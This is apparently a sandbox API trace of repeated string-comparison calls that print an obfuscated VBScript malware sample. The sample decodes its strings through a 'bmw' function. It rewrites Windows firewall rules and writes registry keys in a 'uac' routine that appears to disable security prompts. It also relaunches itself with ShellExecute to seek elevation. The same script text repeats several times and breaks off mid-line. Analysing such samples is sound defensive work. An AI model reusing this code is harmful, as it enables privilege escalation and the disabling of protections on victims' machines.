bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.345] wcsncmp (_String1="if (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.345] wcsncmp (_String1="f (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0226.345] wcsncmp (_String1=" (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.345] wcsncmp (_String1="(InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.345] wcsncmp (_String1="InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 